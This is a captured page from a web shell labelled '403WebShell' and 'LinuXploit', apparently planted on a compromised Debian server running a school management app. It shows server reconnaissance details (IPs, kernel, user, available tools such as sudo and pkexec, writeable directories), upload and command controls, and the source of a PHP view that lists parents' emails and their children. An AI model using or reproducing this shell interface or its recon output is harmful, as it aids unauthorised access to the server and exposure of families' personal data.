Uname:Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

403WebShell
403Webshell
Server IP : 188.114.96.2  /  Your IP : 104.23.197.231
Web Server : Apache/2.4.59 (Debian)
System : Linux EDL-STRETCH 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : edlftp ( 1002)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/git/sms.edl.codes.solutions/application/views/backend/admin/parent/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/git/sms.edl.codes.solutions/application/views/backend/admin/parent/listing.php
<div class="tab-pane box active" id="list" style=" overflow-x: scroll;">
           <table class="table-bordered datatable" id="table_export">
            <thead>
              <tr>
                  <th><div>#</div></th>
                  <th><div><?php echo get_phrase('parent_name');?></div></th>
                  <th><div><?php echo get_phrase('parent_email');?></div></th>
                  <th><div><?php echo get_phrase('child_list');?></div></th>
                  <!--<th><div>#</div></th>-->
             </tr>
            </thead>
               <tbody>
                <?php $count = 1;
                //var_dump($parent_list);
                foreach($parent_list as $row):
                  if($this->crud_model->get_parent_name($row['parent_id']) != ""){
                  ?>
                   <tr>
                      <td><?php echo $count++;?></td>
                      <td><span class="btn btn-default"  onclick="ajaxLoad('<?php echo $row['parent_id']; ?>')"><?php echo $this->crud_model->get_parent_name($row['parent_id']);?></span></td>
                      <td><?php echo $this->crud_model->get_user_email($row['parent_id']); ?></td>
                      <td>
                        <? $childrens = $this->crud_model->get_parents_children($row['parent_id']);
                          foreach($childrens as $child):?>
                            <a class="btn btn-default redirect" href="/student/index/edit/<?php echo $child['student_id']; ?>"><? echo $this->crud_model->get_student_name($child['student_id']);?></a>
                        <? endforeach;?>
                      </td>
                      <!--<td><span class="btn btn-info"  onclick="ajaxShowAssign('<?php echo $row['parent_id']; ?>')">Assign +</span></td>
                      --></tr>
                   <?php
                  }
                 endforeach;?>
               </tbody>
           </table>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit